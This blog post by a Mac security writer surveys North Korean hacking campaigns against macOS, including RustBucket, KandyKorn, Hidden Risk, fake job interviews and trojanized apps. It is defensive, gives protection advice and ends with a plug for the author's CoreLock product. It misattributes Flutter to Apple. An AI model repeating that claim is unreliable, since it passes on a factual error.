North Korean Hackers Are Targeting Macs — And They're Getting Better at It

I follow Mac security news obsessively. It is quite literally my job. And over the past two years, one trend has stood out above almost everything else: North Korean state-sponsored hacking groups have made macOS a primary target, and their tradecraft is evolving faster than most defenders can keep up.

This is not hypothetical. These groups stole over $2 billion in cryptocurrency in 2025 alone, according to Chainalysis research. The Bybit heist in February 2025, attributed to the Lazarus Group, netted $1.5 billion in a single operation — the largest crypto theft in history. And a significant portion of these attacks specifically target Mac users.

Here is what you need to know.

Why Macs specifically?

The answer is simple: follow the money.

Cryptocurrency companies, blockchain startups, venture capital firms, and fintech companies overwhelmingly use Macs. Walk into any crypto startup in San Francisco, Austin, or Miami and you will see rows of MacBooks. The developers writing smart contracts, the founders holding keys to multisig wallets, the engineers with access to deployment infrastructure — they are almost all on macOS.

North Korean hacking groups figured this out years ago. If your targets use Macs, you build Mac malware. And that is exactly what they have done, developing an entire arsenal of macOS-specific tools that rival anything we have seen from other nation-state actors.

The groups responsible fall under the Lazarus Group umbrella, which is itself part of North Korea's Reconnaissance General Bureau. The subgroup most focused on financial theft and Mac targeting is called BlueNoroff, and they have been exceptionally active.

The malware families you should know about

Over the past three years, security researchers at SentinelOne, Jamf Threat Labs, and Elastic Security Labs have documented a growing list of macOS malware families attributed to DPRK-linked groups. These are the major ones.

RustBucket

First documented by Jamf Threat Labs in April 2023, RustBucket was one of the first clear signals that BlueNoroff was getting serious about macOS. The attack typically began with a PDF lure — the victim would receive a document that appeared to be an investment memo or business proposal. Opening it required a special "PDF viewer" application, which was actually the first-stage dropper called SwiftLoader.

Once running, SwiftLoader would fetch and execute the real payload: a backdoor written in Rust. Elastic Security Labs later identified updated variants with improved persistence and evasion techniques. The malware could collect system information, download additional payloads, and execute arbitrary commands.

What made RustBucket notable was its sophistication. It used multiple stages, multiple programming languages, and legitimate-looking lure documents tailored to each target. This was not mass-market malware. It was precision-targeted espionage tooling built for macOS.

KandyKorn

Discovered by Elastic Security Labs in late 2023, KandyKorn targeted blockchain engineers at cryptocurrency exchanges. The attack chain was elaborate: it began with a social engineering campaign on Discord, where attackers posed as fellow developers and shared what appeared to be a Python-based cryptocurrency arbitrage bot.

Running the "bot" triggered a multi-stage infection chain that eventually deployed KandyKorn, a full-featured backdoor written in C++. KandyKorn could steal files, list directories, upload and download data, kill processes, and execute commands. It also hijacked the victim's legitimate Discord application to maintain persistence — a clever trick that made the malware harder to detect because the malicious activity appeared to come from a trusted app.

ObjCShellz

Reported by Jamf Threat Labs, ObjCShellz is a simpler but effective tool written in Objective-C. It functions as a remote shell, executing commands received from a command-and-control server. It was observed being used alongside RustBucket as part of the same campaign infrastructure, essentially giving the attackers a lightweight way to run commands on compromised Macs without deploying a full backdoor.

Hidden Risk

This is the one that really caught my attention. Documented by SentinelOne's SentinelLABS team in October 2024, the Hidden Risk campaign represented a tactical evolution. Instead of the elaborate social engineering that characterized earlier campaigns, the attackers sent straightforward phishing emails with links to fake cryptocurrency news articles. Titles like "Hidden Risk Behind New Surge of Bitcoin Price" and "Altcoin Season 2.0 — The Hidden Gems to Watch" were designed to appeal to crypto industry workers.

Clicking the link downloaded a malicious application disguised as a PDF. Here is the alarming part: the dropper was code-signed and notarized by Apple. That means it passed Apple's automated security checks and would not trigger Gatekeeper warnings on the victim's Mac.

The campaign also introduced a novel persistence technique, abusing the zshenv configuration file. When you open a terminal on macOS, the system reads zshenv before any other shell configuration. By injecting code there, the malware ensured it would run every time a terminal session started. SentinelLABS noted this was the first time this technique had been observed in the wild.

Flutter-based malware

In late 2024, Jamf Threat Labs discovered DPRK-linked malware samples built using Flutter, Apple's cross-platform UI framework. The use of Flutter provided built-in code obfuscation, making analysis significantly harder. Like Hidden Risk, these samples had been signed and had temporarily passed Apple's notarization process before being revoked.

The attack vectors

If you study these campaigns, clear patterns emerge in how the attacks are delivered.

Fake job offers and coding challenges

This is the most prolific vector, tracked by Palo Alto Networks' Unit 42 as "Contagious Interview." Attackers create fake companies in the blockchain and crypto sectors, post job listings on LinkedIn, GitHub, and freelancer platforms, and then ask applicants to complete coding challenges. The challenge code contains a malicious dependency that installs BeaverTail or InvisibleFerret malware when run. Unit 42 has identified at least 192 malicious packages tied to this campaign.

The FBI issued a specific warning in 2025 about DPRK IT workers using fake identities to get hired at real companies, giving them direct access to internal systems and proprietary code. Hundreds of Fortune 500 companies were affected.

Fake business meetings

The "Prospect Call" campaign, investigated by Daylight Security in 2025, showed another approach. Attackers contacted targets via Telegram, posed as potential business partners, and escalated to a Microsoft Teams call using a lookalike domain (teams.microscall[.]com). During the call, they claimed audio issues and coached the victim into running terminal commands to "fix" the problem. Those commands downloaded and executed malicious binaries that accessed the macOS Keychain and established connections to attacker-controlled infrastructure.

Trojanized applications

Several campaigns have used applications that look and function like legitimate tools — PDF viewers, crypto trading platforms, note-taking apps — but contain hidden malicious payloads. Because some of these were successfully code-signed and notarized, they bypassed the standard macOS security warnings that most users rely on.

What they are after

The primary objective is cryptocurrency. North Korea's crypto theft operations have generated an estimated $6.75 billion to date, according to cumulative tracking by Chainalysis and other blockchain analytics firms. These funds are believed to finance the regime's weapons programs.

But crypto is not the only target. These groups also seek:

• Private keys and wallet seed phrases stored on developer machines
• Code signing certificates that can be used to sign future malware
• Source code for cryptocurrency platforms, which reveals vulnerabilities
• Credentials for cloud services, deployment pipelines, and internal tools
• Intellectual property that can be leveraged for extortion — the FBI documented cases of DPRK IT workers extorting companies by threatening to leak stolen proprietary data

How to protect yourself

If you work in crypto, fintech, blockchain, or venture capital — or honestly, if you just use a Mac — here is what I recommend.

Verify everything you download

Do not run code from job interviews without scrutinizing it first. Do not open "PDF viewers" sent by people you have never met. Do not run terminal commands someone gives you on a video call. These sound obvious, but these exact tactics have compromised experienced developers at well-known companies.

Check code signatures

Before running any application, right-click it, select "Get Info," and check who signed it. If it is unsigned or signed by an unfamiliar developer, do not run it. Remember, though, that some DPRK malware has passed notarization — so a valid signature is necessary but not sufficient.

Watch for suspicious processes

Malware needs to run as a process. If you know what is normal on your Mac, you can spot what is not. Unexpected processes making network connections, unfamiliar launch agents or daemons, or applications running from unusual paths like /tmp or cache directories are all red flags.

Monitor network connections

DPRK malware phones home. It connects to command-and-control servers to receive instructions and exfiltrate data. Monitoring outbound connections from your Mac can reveal compromises that other detection methods miss.

Keep macOS updated

Apple regularly revokes the code signing certificates used by malware and patches the vulnerabilities these groups exploit. Staying current on macOS security updates is one of the simplest and most effective defenses.

Use dedicated security tooling

The built-in macOS protections — Gatekeeper, XProtect, the Malware Removal Tool — are good but not sufficient against state-sponsored attackers who have demonstrated the ability to bypass notarization. You need something that monitors process behavior, network connections, and persistence mechanisms in real time. That is exactly what I built CoreLock to do: give you continuous visibility into what is actually running on your Mac and alert you when something does not look right.

The bigger picture

What concerns me most is the trajectory. Each new campaign is more polished than the last. The social engineering is more convincing. The malware is more sophisticated. The ability to pass Apple's notarization — repeatedly — shows a level of operational capability that should worry anyone who assumed Macs were inherently safe.

The myth that "Macs don't get viruses" was always oversimplified. But in 2026, with nation-state actors specifically building tools to compromise macOS, it is actively dangerous. North Korean hacking groups have proven that Macs are not just targetable — they are targeted, deliberately and persistently, by some of the most well-resourced threat actors on the planet.

The good news is that awareness is growing. Researchers at SentinelOne, Jamf Threat Labs, Elastic Security Labs, and Unit 42 are doing excellent work documenting these threats. Apple is improving its platform security with every release. And the Mac security community is paying attention.

But ultimately, your security starts with you. Know what is running on your machine. Verify what you download. Be skeptical of unsolicited messages, especially if they involve money, jobs, or running code. These groups are patient, professional, and very good at what they do.

Stay sharp out there.